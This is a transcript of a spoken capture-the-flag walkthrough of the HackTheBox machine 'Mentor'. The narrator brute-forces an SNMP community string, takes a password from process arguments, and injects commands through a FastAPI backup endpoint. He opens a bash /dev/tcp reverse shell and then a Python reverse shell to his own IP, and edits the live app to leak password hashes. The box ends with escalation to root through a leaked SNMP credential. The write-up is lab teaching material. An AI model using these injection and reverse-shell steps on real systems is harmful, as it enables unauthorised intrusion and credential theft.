What's going on YouTube? This is Ipsec. We're doing Mentor from HackTheBox, which is a relatively straightforward box as long as you value recon and take things slowly and have a good workflow. And I say that because there's a step early on in the box that if you skip, it's going to just spin your wheels consistently because you have to enumerate SNMP is running on the box and then brute force the community string. And there's a trick to brute forcing the community string. A lot of the tools, for some reason, just fail. I don't know why, but like Hydra and OneSixtyOne won't find the internal community string. You have to use a tool called SNMP-BRUTE, at least that's the tool I use to find it. And if you don't do that, you'll find an API web page that's coded in FastAPI, but you can't do much without finding the SNMP info first. And then once you get a shell on the box, the next step is finding a password that's coded in the SNMP config file. I think it's part of like SNMP v3. But if you just run a lot of tools like LinPEAS, for some reason, it doesn't detect that. So at the end of the video, we'll go over LinPEAS and add it in so we detect it in the future. With that being said, let's just jump in. As always, we start off with an Nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the Nmap directory and call it mentor, then the IP address of 10.10.11.193. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache HTTPD version 2.4.5.2, and also that it is Ubuntu. It's also redirecting us to mentorquotes.htb, so if we went to the website 10.10.11.193, we get a 404 page because we don't have that in our host file, so let's add it there. So sudo vi etc host, and then 10.10.11.193 mentorquotes.htb. So now when we refresh the page, we get to a page that just has a bunch of quotes. So the very first thing I want to do is look at the header. We could use curl, but Burp Suite is a bit quicker. Let's make sure intercept is on. Then send it. Go over to, well, I meant to go to the repeater tab. And we can look at it and we see it's workzug and Python. So we know this is going to be a Python application. It's probably going to be Flask. We could verify it by just getting like a 404 page. So if we go to like does not exist, we see this error message. If you Google error messages, generally they tell you something even if it looks generic, and we see bunches of Flask. So we know this is going to be a Flask web server. There's no point in like doing the extension PHP when we look for things. So I'm going to set up a GoBuster to enumerate this. So GoBuster dir -u http mentorquotes.htb word list opt sec list discovery web content raft small words.txt. And I guess we should store an out file, so root.out. And as that runs, we can also do some virtual host enumeration because it has directed us to a DNS name. So I'm going to do ffuf. We could also use GoBuster. I've been a bigger fan of ffuf lately for using this type of enumeration. So mentorquotes.htb, add the host header, so -H, host, and then fuzz.mentorquotes.htb, and the word list opt sec list. Let's do discovery, DNS, and we'll do subdomains top, million, 20,000, sure. So I'm going to hide everything with 18 words. So we do -fw 18. And then the other thing we really need to do, I wish it was default on ffuf, is a -mc all to match all error codes. So I'm going to do -mc all. And right off the bat, we get a 404 error code on API. So I'm going to add that to my host file. So sudo vi etc host. And then we can add api.mentorquotes.htb, save it, and take a look at it. So api dot, and we get this one page. I'm going to guess this is FastAPI right off the bat, just based upon it returning the JSON like that. If we put that in our host header, we can see the server is UVicorn. I don't know how to pronounce that, but it is just returning JSON. A very common thing with FastAPI. Actually, let's just Google this thing. I'm going to go to Google, turn Burp Suite off. If I Google this response, what happens? Django. We have one FastAPI post, but this is definitely FastAPI. And FastAPI does have a /docs, right? So I just know that from playing with the framework, and going to /docs gives us the Swagger page. Glancing at it, it doesn't look like any of these endpoints require authentication because we don't see the lock next to their name. However, when we click on it, we do see the authorizations required. Clicking execute, we can put something here, and then going in, it says it requires the header authorization. So authentication is required. FastAPI just isn't configured with authentication in mind. It is one of my big pet peeves because I really like seeing the locks next to each endpoint because, number one, the lack of authentication on some API endpoints is a common finding, so making it visual lessens that chance. Also, authentication is being done uniformly across all of your endpoints when you have a visual representation. So we'd have to click on each one of these and make sure and test just because it's not coded the right way. We'll look at it at the end of the video to see exactly how to do that. But all these endpoints require authentication except the sign up. So let's try out this endpoint. We can sign up with our email. We can do like root@ipsec.rocks. And then a username of, we'll do ipsec. And then a password of, we'll do password, right? And then we click execute. And we can see user ID 4 is created. So now when I go over to the login endpoint, we can do try it out. Log in with the same email, username of ipsec, password of password, and then click execute. We can see it gives us a JWT back. I'm saying JWT because I see 3 base64 strings. If we look at this one, echo-n base64-d, the JWT is username ipsec, email root@ipsec.rocks. So username and email's in this. I'm going to copy this real quick, and then we can go to the user's endpoint now that we have a user account. Paste this in, click execute, and it wants the header again. So maybe I need to do authorization like this. Click execute. That's not working. Let's send it over to Burp Suite to see exactly how this is looking. So I'm going to click execute. And we see the actual page isn't adding it at all. And I'm pretty sure if we did the proper way, then there would be a way to add this authorization header to everything. I want to say we need to add bearer. Maybe not. Does that work? No. So sometimes with JWTs, you add bearers, sometimes not. So here we can see only admins can access this resource. I'm going to do /1 to see if we can even get like user information. We are user ID 4. We still can't get it. And I think Rainy Day had like 4.0 to put a float here and did something. And if we do that here, only admins can access the resource. So can't really get any details out of this. We could look at the quotes endpoint. So now that we have this, we can just edit a request. I'm going to put this to be users. This can be quotes. If we get quotes, it returns all the quotes that we saw on the first page. If we do 1, we get this one. If we do a float, we get the value is not a valid integer. So this is a Pydantic thing most likely, just because FastAPI generally use Pydantic for handling inputs and outputs. And all that does is like a strict typing thing. So you can't give it unexpected input or it doesn't give you unexpected output. It's a really nice thing that we'll probably dig into in a little bit. So let's look at what else is the quotes. If we do a post, we can create a quote. So let's do post and just hit the quotes endpoint. Only admins can access it. Let's see, we could do a put. probably going to say only admins, right? Method not allowed. So we need to do put on quotes 1, only admins, and delete, I'm guessing only admins as well, right? Yes. So I don't know exactly what we could do. We could like, I was going to say we could try like SQL injection here, right? But again, the Pydantic is going to stop us from sending anything but an integer to this field. So nothing we can really do. So we have to go back and think of what recon. Maybe this API isn't showing us all the endpoints. So one thing we could do is a ffuf. So I'm going to copy this to a request. So copy to file. And I'm going to make this api.request, save it, and we'll v api.request. And I'm going to do a fuzz here. And we can do ffuf dash request api dash request proto http word list opt seclist discovery web content. Is there API here? Let's see. Let's just save this and then grab this grep-i API. So web content API in lowercase. Okay. Common paths. Sure. -mc all. And let's see. Status 404. Let's dash filter words 2. And we don't get anything here. Let's see. Instead of common paths, what else is there? We can do actions lowercase. And we see there is a /admin. And the main reason I used ffuf here instead of GoBuster is just because I could paste in the raw request and don't have to worry about the authorization header. I know I could have done it with the flag in GoBuster, but I like passing the request like you saw me just do. So if I get /admin, we can see exactly what this looks like. Only admin users can access this. So we have to figure out how to get to an admin. And if I went back to this, we see James mentioned twice. We have an email for James, but we don't have his password. We could try logging in and just guessing it, right? So if we try it out and do James at mentorquotes.htb, I think it was. And then James, we could try logging in. We probably should disable burp suite. And we get not authorized. So we could do like or 1 = 1 and try SQL injection here, but it's probably super unlikely and we don't get it as well. So at this point, I'd run out of things to think of, and maybe there's another service I'm just missing, right? So we'll do sudo nmap -p -v to show open ports as we find them, -oa nmap all ports 10, 10, 11, 193. And then we could also, let's see, let's clean this pane up. So the bottom one is that nmap. We could do a second nmap. So sudo nmap -su to do UDP -oa nmap. We'll call this UDP 10, 10, 11, 193. And again, -v to see open ports as it finds them. So we can see how long nmap sometimes can take. And this is why I always say have recon running in the background because you can't hack time. This one took around 3 minutes and 25 seconds. And we still have this nmap going on, and we haven't found the port that we need on this UDP scan. So it's always something you should do out of habit just in the background. We're going to keep it running. Hopefully it finds it and did not miss it because we had an nmap running while we did this port scan. Okay, so it's been almost 20 whole minutes, and nmap has finished for the UDP. And what's more frustrating is the port I was expecting to see, SNMP, is not on this list. And when it was running, I always thought about canceling and restarting it because I had an idea what went on when I saw all these error messages above. But I decided to let it play through just so we can use this as a learning experience, because if you're doing too many things at once, especially with UDP scans, you'll get mixed results and things like that. So I'm just going to run it now that I don't have a second Nmap running, and we're going to see if it finds the SNMP port and how long this takes. So we see it's still doing a few errors, and that's just because of the VPN. Maybe it's going to do all the same ones. I did not actually expect to see that. So it went 4, 5, 6, 7, 8. So we still have that send delay going on. So let's see if it ends up finding SNMP this second time still. It's probably going to take about 20 minutes to run, but hopefully it finds SNMP this time. So I'm just going to let it run, pause the video again, and we'll see what happens. And we finally have UDP 161 reported open. I'm going to let Nmap finish just to see how long it takes, see if it's still like 20 minutes. And then we're going to run Nmap one more time just to make sure it discovers 161 2 times in a row when we're not doing anything in the background. So here we have the output of the second Nmap. We see it's 1008 seconds. I think the other one was like 1100. Looking at it, yeah, we see 1100 here. But we do have 161 open. I'm going to run it one last time, and we're going to see how long it takes and if 161 is open. I'm assuming it will be, but honestly, I don't know. And this probably would go faster if I was connected to a US VPN server, because I am in the US, but I'm currently connected on a European one. So the latency is a bit higher, so my UDP Nmap will go slower. So let's just hope 161 does show up. Okay, so I'm not exactly sure what happened here, but our Nmap shows a lot of UDP filtered ports. That being said, there is just one open, and that is going to be SNMP. So after doing the video and talking to OXDF, he reminded me of one super handy flag when doing Nmap, and that is the min rate flag. So I'm going to set the min rate to 10,000 and then just do 10, 10, 11, 193. And we can see UDP reliably discovers 161 even at this high rate, and it only takes 1 second to run. So this definitely does come pretty handy if you want to detect SNMP on future boxes. When doing the min rate this high, just be careful because like all these closed ports, it's not reliable going to be the same one. And I think that's just because you're flooding the packet. If you look at it on a network capture, you'll see that even though you send like a UDP request to 2148, the server will respond with an ICMP back saying the destination is not reachable if that port isn't open sometimes. And I think when you do this many packets at once, it can't send all those requests back to you and you miss some. So yeah. So hopefully you enjoy the min rate piece. Let's get back to doing the box. So the path through this box is most likely SNMP. So let's do a SNMP walk against it. So SNMP walk -v2c, which is the default version that you normally use, and C public, that's the default community string. And then 10, 10, 11, I think it was 193. Yep. And we start getting things. I saw a admin@mentorquotes.htb. This, I think, is a default thing, but there isn't any good information in SNMP. However, there is a possibility there's a second community string configured. So I'm going to go and download SNMP-BRUTE, which is just a good brute forcing script for this. Let's see, Python GitHub. There we go. And then let's just clone this to our box. So git clone, copy it, and then we can do Python 3 SNMPBRUTE.py to see the options there are. And there's quite a bit. Let's see, we want -t, the IP, and -f, the dictionary. So I'm going to do a find on seclist to find a good word list first. I'm just going to grep -i SNMP, and we have this one. So I think any of these would work. Let's see, zargs wc-l. We can see how big each of these files are. 118 lines. That's a good one for a first bet. So let's do Python. And then it was -t, the IP. So 10.10.11.193. And then I think just the community string or the dictionary with -f for a file, I guess. We run this and we see there is version 1 public, version 2 public, and version 2 internal. So we do have a internal one, and you could do -b for brute, so it doesn't ask you for enumeration. Generally, I don't like using these SNMP tools to do enumeration. I just use SNMPWalk. Before moving on, I just wanted to show some other SNMP tools and show it just didn't work. So if you use these tools in your current setup, I would definitely switch out for SNMP-BRUTE, right? So we do 161, which I think is the tool I used a long time ago in the last box that required SNMP. Let's see, what is -h? So we need -i for the IP, 10.10.11.193. It wants it to be a file, so we can trick this with this little bash trick. So now it runs this command and treats it as a file when you do it with this less than in parentheses. But we do see it comes back twice with public. It doesn't pick up the internal, which is odd. If we grep internal on the word list, we see it's there. If we grep public on the word list, we have all public. I don't know. Let me try one thing real quick. Sudo vi all public. I'm going to delete that from it. I'm going to run it again. So it looks like it's just treating the all public as public. For some reason, it doesn't pick up on internal, which I just can't understand why. So 161 failed. We also have Hydra. So you can do like Hydra -p opt seclist discovery SNMP common strings .text and then -v the IP and then SNMP, and it will quickly resolve public, but it never will discover internal. I think it takes about like 10 minutes to run for some reason. Hydra is slow in this sense. So I'm just going to pause the video. We'll come back to it and show it did not detect internal. It finished a bit quicker than I expected, only taking, I think, 1 minute. However, Hydra only detected public. So both Hydra and 161 failed to detect the internal community string for this box. So definitely use SNMP-BRUTE. But with that being said, let's get back to the box. So if I go back up here, we do SNMP-Walk and put internal here. It's going to dump a lot of information. Now this one can take a while. I'm going to do time against this, and then we're going to do a SNMP-BRUTEWalk as well. And we're going to see the difference on the two. So let's do, if I just paste this, I think BRUTEWalk has the same arguments. It does. Sweet. So let's do time against that, and we'll call this bulk.out. And I'll use T so I can see the output as it comes. Let's copy. There we go. T bulkwalk.out. And then we can just do a time here. It's going to give me the same exact information. I just want to see the time. So I'm going to pause the video, let both of these finish, and we're going to see how long they take. So the regular SNMP-Walk took about 13 minutes, and SNMP-BRUTEWalk took around 1 minute. So it's definitely faster to use BRUTEWalk when dumping the entire MIB. And we see a lot more information than we had saw when we just looked at the public community string, right? This is showing like all installed software right now. We have list of packages here. There's also going to be the actual programs and arguments that is running. So let's just take a look at this type of area. So I'm going to do a less against the file and then search for HR software run path. And we can see everything here. I want to say the 362, these are PIDs. I may be wrong there, but we do see it jumping. So I know it's not incremental. Almost positive it is a PID. And this isn't showing the arguments, but there is another one that will show arguments. For instance, we see just this one Python thing running here. There's a Python thing running here as well. If we looked at 2123, let's grep that real quick. So I'm going to grep 21. Actually, we have to go in SNMP-BRUTE. Well, no, we're here. Bulk walked it out. Okay. So grep, what did I say? 2123? Right here. Yep. 2123 on bulkwalk.out. And we can see everything related to this. So I'm guessing this is just telling us the PID. Here is the program the Python is running. We have the path to Python. This is probably going to be the CMD line. If you looked in like /proc and we see login.py and some credential and then nothing else, right? So this is probably going to be a password to something just because it's being passed to login.py. And this is one of those reasons why any type of hardening thing will tell you never to put passwords as arguments just because it gets leaked when you do processes. So like ps-ef and things like that. So let's grep on 2050. Let's just see something else and then we'll move on, right? So 2050, we can see this one is Python. This is doing some multiplexing semaphore track. I want to say this is the FastAPI. Let's see. What did we just do? Let's try 1916. I don't think I checked that. I was trying to find the FastAPI server, but it's going to be one of these. Here we go, UV Icorn. So this is most likely FastAPI. We can also see the -- reload, which means the web server will automatically load new code if you manage to write to a file on it. So it behaves kind of like PHP in that aspect where if you write to a PHP file, then call it again, it gets executed. If this reload wasn't in this, then if we wrote to a Python file, it wouldn't take effect until Python itself is restarted. So this is just monitoring all file writes to the Python scripts within the directory, and if they change, it reloads the server, right? But we have this password to login.py. And if we go back to Mentor, we did have an email username, so I'm going to put that password in for this. And then when we click execute, we get a session ID. And before, we were getting like invalid user or something. So now we have a way to access admin endpoints, right? So if I went to users and we run this again, let's see, path ID, oh, not a valid integer. So we put this, user not found. We can dump a list of users. If we do it with no arguments, we get 1, 2. It's odd that, let's see, 3, 4. So user not found. I wonder what my user ID is, unless my user got deleted that I created in the box. So we'll have to look at the code there to see exactly what this endpoint is doing that I don't see the user I created. But we have two usernames, James and SVC. We could try logging into SVC, but it's not going to work. I just know that from the power of hindsight. So let us check that admin endpoint. Remember, there's this endpoint /admin that only admin can access. And if we try to, we can see there's a /check and /backup now. So if I enter /check, we get not implemented yet. So let's do /backup. And we get method not allowed. So if we do let's try options, not allowed. Let's try post. There we go. So now we have an error, unprocessable entity. It requires a body. So since this is FastAPI, I'm just going to put JSON. And I don't know any fields, so I'm just open and close curly bracket. So we put something in the body, and it tells us now path is required. So if I do path, and then etc passwd, and then I guess end it with a comma. Let's see. I screwed something up here. Okay, so it doesn't want to be ended with a comma for some reason. I guess that's just how it expects JSON. I bet if we had multiple variables, then you'd put commas in. But the last one does not. And we just get info done when we run this. So we can try something with it doesn't exist. We still get done. We could try hitting check, and we get method not allowed. Let's change it to a get, not implemented yet. So we don't know exactly what this backup is doing. We could test for like command injection. So we could try etc passwd and then sleep 1 and see if this request takes 1 second. It does not. We can also try a ping. So I'm going to test ping against myself because I always get these flags wrong. If it's -c or -n, it is -c1. So let's do a sudo tcp dump -i ton0 icmp -n to disable DNS. And I'm probably going to add a -v as well. And then try ping -c1 1010 14 8. And I'm going to end it with a semicolon as well, just in case it adds something to the path. It takes 200 milliseconds, and we get a ping. I'm going to try sleep 1 again real quick, because the time does go up when we use ping like this. And maybe it was this semicolon that I screwed up with. And that was it. So what's happening here is it must be putting something after the path. And when we don't have the semicolon, it creates invalid syntax. So it just automatically ends it. So since this is a backup feature, maybe it's doing tar. And it's doing like tar. Let's go over here. Maybe it's doing tar-cjvf backup.tar.bz2. And then taking user input here and backing up another file. Let's add this. It's adding something at the end after user input. I don't know what it is, but when I just put sleep 2 here, like this, it appended etc passwd after this, which caused my script to error because this is an invalid command. When I ended the sleep 2 with a semicolon, then it executes just this, and that's why it worked, right? So now we have some type of blind execution. We can try like a reverse shell now. So I can do bash-i dev tcp 10 10 14 8 9001 0 and 1 like that. And again, make sure we have that semicolon at the end. URL encode it for good measure. nclvnp 9001, send it, and we just get done. We can try putting bash-c before this, just in case this is not being executed in bash. And then we run it again, still don't have a shell. So I'm going to guess we may be in some type of Docker, or bash just doesn't have, for some reason, like the network thing like we did with the dev TCP. So I'm going to get a Python reverse shell, because we know this box has Python because it is FastAPI. So I'm just going to do revshells.net, I think it is. Or let's see, Google revshells. Let's see if this comes up real quick. Revshells.com. And I'm going to search for Python. Let's just do Python 1, put our IP, and then copy and paste this. So paste this, and we can say Python. Oh, it's already doing Python here. So when we send this, we get some type of errors, and that's because of quotes. So we have to escape every single quote. Does this have anything? We could try URL encode. Let's see what happens with this. I'm actually not sure. I know escaping the quotes will work, but maybe URL encoding does as well. Does not. Or I screwed something up. So let's just escape the quotes. So get rid of that, get rid of that. Let's see, where else is there a quote? Where our host and our port is. Okay. Oh, SH as well. So now we have escaped all the double quotes. So this should be val in JSON. And then we run it, and we don't get a response here, which is a good sign because we have a shell. So Python 3-c import pty, pty.spawn, bin.sh. And I'm doing bin.sh because I'm not positive bash exists yet. So that's done. stty raw minus echo fg, enter twice. And now we have a good shell here. So we could look for like bash to see if it exists, and it doesn't look like it does, so that's why our previous reverse shell did not work. But the very first thing I always do when I get a shell somewhere is try to get credentials out of the web app. And if we look at this Docker file, we don't see any credentials exposed. Oddly enough, it is exporting home svc.local bin to path. So I'm guessing that's where the app exists. So let's see, there is a config.py. If we look at it, we don't get anything. There is db.py, and we have it running Postgres, and it's going Postgres against 172.22.0.1, which I'm going to guess is probably the host. Let's see, IP-ADDR. Let's see, I'm in 22.03, so Postgres is probably going to be on the host system. Let's see, what else is there? Do we see Postgres credentials? That's database user. Metadata. Email password database. Let's see, grep-ri password. Does this not have recursive grep on it? It does not look like it does. So I'm going to do a ls-la to see if there's like a .env file. I do not see one. Let's go back in db.py. Oh, the credentials. Sometimes default credentials, I guess, just hide in plain sight. So the credentials are Postgres to this box. We could you upload chisel to this box and forward the port and access it, and then get a shell that way. We'll do that probably at the end of the video. The way I generally do this, if I'm in a rush or I can't get a reverse shell, since we know the reload is on this box, where is it? Right here. We can just edit the file. So this is a FastAPI, and if we go into the API directory, we can see all the files. So if I look at users, this is going to be the user endpoint. So if we just get user ID, we can see it's doing a response model, and this is going to be the Pydantic piece. And if we look at this, it's doing user is equal to await. This is going to be some async IO thing, so we can run multiple tasks at the same time. It doesn't really matter here. And it's doing a crud.get user. And CRUD is just a terminology mainly used for database, like create, I forget what it stands for. Create, R is something, update, delete. So R is probably some way to, probably create, replace, update, delete is what CRUD, I would guess. But if we look at crud.py, the main thing I'm showing here is we don't have anything filtering the password out, right? And if we look here for get user, it's just doing a users.select and returning a fetch all off the database. So there's nothing here that's also filtering the user. So what is filtering the user when we get an ID is the response model. It's userdb. So if we look at the models, and this is going to be the Pydantic code, we don't have vim, so we can do vi. We can see the base model is just ID, email, username. The database is probably returning everything, but Pydantic is saying return this JSON blob with only these variables. We know the password is in the user schema. So if we add password to the userdb model of Pydantic, we can do password here. And I used YY and then P for put. And I did that because I don't know if this is tabs or spaces, it's always safer when you're editing code in Vim on a target to copy and put lines down just so you get all the spacing correct. Because if I use tab here and it was using spaces, the code would crash, right? So it's just a safety thing. So I'm going to write this file. And now if I go back to the users, right? And then we run this, it's not working. Did I crash the server? Or maybe this isn't multi-threaded. So maybe the server's hung while I have this reverse shell. We don't see it working. Exit. Okay, now we get it. And we don't have, there we go. Now we have the server reloaded. So the server wasn't reloading until I exited the shell. And then once I did, it reloaded and we see the user model now has password in it. So when we get a user, we can get the hashes as well. What's going on? It's me from the future again, and I wanted to highlight this whole thing of the web server hanging because it is somewhat a common issue when attacking servers that are in development that don't have something proper like Nginx or Apache in front of it that do threading. So let's just show this real quick. And we run this command, we get a shell, and nothing responds to us until this shell dies. And the whole reason that happens is if we look at ps-ef grep on, let's just do app, we can see this is the command that's running, and it's just got 2 workers assigned to it. I'm pretty sure if we up this to 3 workers, then it would work in the background. I think 1 worker is just the master, and then anyone that we connect is another one. So when we hang the 1 thread, there's really no more threads left to accept users. And that's why we're in this state, right? So if I just have this path to be just etc passwd, again, it's not coming back to us. The web server opens the connection because we're part of that master worker, but when it tries to fork us over into the other thread, it just can't because it doesn't have the workers available. So we could fix that, but before I do, I want to show if you didn't get a proper PTY and Control-C out of the session, it still hangs on the server and it becomes a royal pain, right? And many people had to revert the box when this type of thing happened. Thankfully, I'm from the future and have a root shell here, so we can just do ps-ef grep on Python. See, this shell is still running here. It's probably this command right here. So I can just do a kill-9 on this. And now this comes back to us. So the easiest way is just to run a command called nohup. I'm guessing it's on the container, but we can just do nohup and then leave this command and we put an ampersand at the end. So if I do nclvnp, run it, and we did not get a shell. So the best way to troubleshoot this is let's just run it locally, right? So I'm going to take this Python shell actually first. I'm going to run it on my machine. Unexpected. Because we have all the escapes, right? Let's see. We probably want to export this as well. So I'm going to get rid of the nohup. This is how we have it. So I'm going to run this. We had a semicolon at the end. And we'll have to get rid of the escapes because we're doing that because it was in JSON. Since we're just running it natively, again, get rid of those. And then one more on SH. So we have the shell, and we can see my terminal down here does hang. So we can exit that, and we want to play with nohup, right? So if I do nohup Python like this, I don't have the ampersand at the end, so it's not going to background. So that works. Now let's put the ampersand here. And we get a invalid command because there's the semicolon at the end. And remember, we have the semicolon here because the actual server's appending data, and we use the semicolon to ignore everything afterwards, right? Looks like we can't use the ampersand and a semicolon. That being said, comments will also ignore everything out. When we do SQL injection, we do the -- space. That's a comment because we want to ignore what the server adds to it. In Bash, it's that little hashtag, right? And that works. So now let us move over to the server. And we're going to put our nohup back in. And then go to the very end, get rid of the semicolon, and I'm going to put that ampersand in. And because this is an HTML or whatever special character, I'm going to press Control-U to URL encode it. And if we just send this, we get info done. So the server responded to us, and we have our shell. So I can go to this pane, and the server is still working, and we have our shell. It's happily backgrounded. So now we don't cause an outage when we're playing with this, right? So we can do pty, or Python C import pty spawn, bin sh, stty raw minus echo fg. And then I'm going to just do a ps-ef forest. Let's see. I guess we can do it on this host. I just want to see what my reverse shell looks like. I don't even know if I see the nohup. That's me, right? Let's see. Nohup. I don't think nohup is even showing up in PS, which is pretty cool. But all the nohup command does is, I bet if we man nohup, it'll explain it better than I could. Run a command immune to hangups with output to a non-TTY. So I think it's just habit. I always run nohup when I do these things. You could probably just do the ampersand at the end. But I think if you do that and something kills the thread, it won't background itself and it'll die as well. I just know nohup makes things much more stable for me. So hopefully you enjoyed this little snippet. So I'm going to go back and edit in a few other things I want to add in this video. We probably already know James's password because that's the user we logged in as. So we have this one credential we want to get, this one hash. We can just go to like CrackStation and put this in. And if it doesn't crack right away, then we can go to something like Hashcat and crack it. But CrackStation is generally my first bet when it's just a hash and not like a bcrypt. It is somewhat annoying because you do get these captchas. But then once we crack, we can see the password is 123 something. I have no clue what that is. But we now have the password to SVC. So I can do SSH SVC at 10.10.11.193. Put in the password. And I get logged into the box as the service account. And when I was doing the box for the first time, I spent a lot of time trying to privesc because this one is not obvious. It's in a file, but LinPEAS itself won't tell you the string. And at the end of the video, we'll probably modify LinPEAS to add it. So I never waste that much time on this step again. But I kind of want to take all the steps I looked at before running LinPEAS to see what is going on. I start off with running a ps-ef, and I can probably search for root so root stands out a bit more. But this is just like looking for various things that are exploitable, right? And the main thing I see first is, well, this is us, right? We SSH'd into the box. We have Apache here. We have 3 different Dockers running, which I didn't know. We experienced the one. Here is the login script that we saw before. And right now I see Postgres. I thought Postgres was running on the host because it was 172.22.0.1, but it looks like there's some routing to put Postgres into a database. So the very first thing I would have tried if I did not run this ps command is going back on the container, trying to chisel my way into Postgres and get a shell that way, because Postgres does allow you to run commands. But I'm just going to be put into a different Docker container, so it's not nearly as interesting to me now that I see that, right? We also have the FastAPI server running in a container as well. And I'm guessing maybe async didn't clean things up because we see a lot of defunct processes. I bet if I ran another sleep, we'd see another one go defunct. So there's definitely a bug in the web server not cleaning itself up. And it is also running in a container. I think I said that. We have this one. This is just executing main.py. Maybe this is just the initial web page that we accessed. We haven't got access to this, so maybe we want to look into this one and get a password from that container, but it's not really that interesting to me. We could try to find what main.py is by just doing a find /-name, and we can hide all errors. And we can see, maybe this is it. Let's see. Python 3. Let's see what this is. I don't think this is it. Maybe. Maybe after we root the box, we can go in that container and see what it is. Let's see, home svc.local. If we go back to the page, mentor quotes, let's see if we can find the file real quick. Your daily motivation, that's probably a unique string. So grep-r, your daily motivation on this. And I don't see anything here. We could change it up by doing like /var. And we probably want to add dev null to standard error. Don't see anything on that. Maybe home. And let's see. Maybe user will be the last one we check. But I want to say if it was in a Docker and we had read access to it, it would be in var. But since I don't see it there, I'm guessing we don't have access to where the web server is hosted. Also, if this was like var www HTML, we'd find it just because of it existing, right? I'm going to cancel that grep because it looks like it's going to take a long time. And we could just also, I guess, curl 172.20.0.1 on port 8000. We get detail not found. If we do localhost on port 80, it gets moved to mentor quotes. And I'm guessing that's var www, right? HTML. Let's see. This is not it, right? No, that's the Apache 2 default page. So maybe in the Apache config, we want to look. So sites-enabled. Let's look at the default. And we have mentor quotes. And it's going to 172.22.0.1 port 81. So we know that this website is in a Docker container, and I don't think we have read access to it. So we can't really just get credentials out of that or see what it's talking to. It's probably talking to the Postgres server. So at this point, I'd probably start looking at forensics. So I see this user was probably created around June 7th. The next step is to look at when the box was created. And I always like seeing the SSH key of the SSH service because this rarely gets regenerated. So it's a good idea of when it was created. So June 3rd. You can't really just take random packages because we see SSH config. This was February 25th. It's actually before this. And the reason why is it was created as part of the apt package, a D package, and it kept that file timestamp. SSH keys are generated upon like install, so that's why that date is different. If we run a stat against these, so let's do stat on etc ssh config, and we'll do the host key as well. So host, let's just do DSA key. We can see everything is June 3rd. And for SSH config, we see this is February 27th, February 25th, June 3rd. And the birth is June 3rd. So ls isn't showing the birthday. This is when the file was created. Change is when like a metadata permissions was modified. Modify is when the file was actually modified. And access is supposed to be the last time the file was accessed. But I don't know if that like actually works well, right? Because if we do a cat against this, and then we do a stat against the same file, the access date doesn't update. But the ls command, what was it showing? If we do lsla at CSSH, it is showing February 25th, so the date it was last modified. And again, this comes out of the D package. Also, if you look like at ipsec.rocks for timestamps and stuff, you'll notice I talk a lot about this, which is the in-depth timestamp, like the milliseconds it was created. And since it's all 0, that's another indicator it was not user created. If we look at it on this, so we do find, or not find, stat etc sh, this, we can see all these timestamps are granular. So long way of saying we should look at timestamps. I'm going to look at June 4th to like June 14th because June 3rd is when the box was created. So June 4th is probably when customizations would happen. And June 14th is like a week after, right? So we'll do a find on, let's just look at Etsy to see system services that have changed. And then I can do a type F for all files, and then newer MT for newer modified time. And we'll do year 2022, June, which would be 06, 04. And then we also want to say a not, so exclamation point, newer MT 2022, 06, 14. And I'm going to go back to the beginning of this and do a -ls so we can see permissions and all that type of stuff. And then to dev null. And let's just do less capital S to put it all on one line. And this is showing every file. So maybe I want to do the ls at the end. I always get these flags kind of mixed up. There we go. That looks better. So when I put ls up here, it was printing out all the files and then doing this, which is meaningless. So I wanted to put the print part on the very tail end. Find arguments are very particular, I guess I should say. So we see Etsy sudo is modified. That's something we haven't tested, is if we can run sudo on this box, I think. We also have the SNMP, and that's really about it. So I'm going to look at the SNMP. So if we do a less on Etsy SNMP, snmpd.conf, it is a relatively big file. A lot of the default things begin with a comment. So what I'm going to do is a grep-v to exclude, and then say everything that begins with a comment, exclude it. And then I'm going to do a grep period to grep every line that begins with a character. And we can see the SNMP config. And one odd thing we see is this create user bootstrap, and it has secure password 123 __. If we look at Etsy passwd, and then let's grep for everything that ends in sh, we can see we are the service user, we have root, and there is James. If we su to James and put that password in, we can log in, and then we look at sudo, and James can run bin sh as root. So we can just do sudo bin sh, and now we are root. So let's take a step back, because LinPEAS really should be able to find this. I'm guessing, let's see, I'm not like an expert on SNMP or anything. I didn't do that much research into this, but I know SNMP v3 has its concept of users. So I'm guessing this is the start of an SNMP v3 config, and they just don't fully configure it. We can see, where is internal? Grep int com2sec. So this is, let's com2sec default internal. So this is why we can see the processes on v2c as the internal community string, because of this line. But I think v3, the create user, is part of that. I may be wrong there, but we do have a credential, right? So let's run LinPEAS to confirm this credential doesn't exist. And I waited till the end of the video to do this because I want to be able to search this string, super secure password, right? So I'm going to go dev shm. Let's download the very latest LinPEAS. So LinPEAS GitHub. Go here, go to releases, and download. So we can download linpeas.sh. We should download it on our box. wget Python a web server. And we can curl 10.10.14.8 port 8000 linpeas.sh. And we'll pipe the output into linpeas.out. We need to bash, and then we can pipe. There we go. So I'm going to let this run, and then we're going to come back and see if LinPEAS tells us about this password. And when it doesn't tell us about the password, we're going to modify the LinPEAS source code, rebuild it, and have a copy that will flag this in the future. So any machine that we run LinPEAS on that has SNMP, it'll be detected. So, okay, so LinPEAS is now done. Let's get the password that we wanted, the super secure password. And then if we grep this on, let's see, linpeas.out, it doesn't get found. We could less super linpeas. Let's see, maybe Vim will be better. I guess we'll just, I wonder if cat shows it. Okay, cat's better. So we can just do SNMP to backsearch, and we can see it actually does have a thing to analyze SNMP specifically and doesn't catch the create user at all, right? So this is the thing that we want to update. So if we go into opt, where we have committed this, so this is where LinPEAS is installed. I'm going to do a git pull to make sure I am up to date. And then I'm going to do code dot to open this up in VS Code. And we can take a look at kind of how it runs. So LinPEAS is, when you commit on it, it's a bit weird because it uses this Python builder to copy a bunch of files into one, right? So what I want to do is find where SNMP is. So if we Control F or edit, find in files, we can search SNMP. And we see it's in software information. It's running PEAS SNMP. WinPEAS, file analysis, file info. These are .NET when it ends in .cs, so I'm going to ignore that. We do have sensitive files. So if I look at sensitive files, we see the name SNMP, auto check. I think this is just going to be if it's a quick check or not. And then we have the file snmp.conf, and bad regex, I'm guessing is going to be, bad is subjective, right? When I first think of bad regex, these are like things I don't want to match against, but this is what I do want to match against, and it's bad. Well, it's not bad to have them in the config. The bad regex is what's going to be shown. So we have our O community, our W community. If we go back to our box, we see our O community here, right? So that's probably why these are getting shown. So we want to add a create user, right? And I only care about users when it starts with create user, probably. If we go with this, yeah. So I'm going to put one for create user like this. And then we're going to save it. And then we have to build 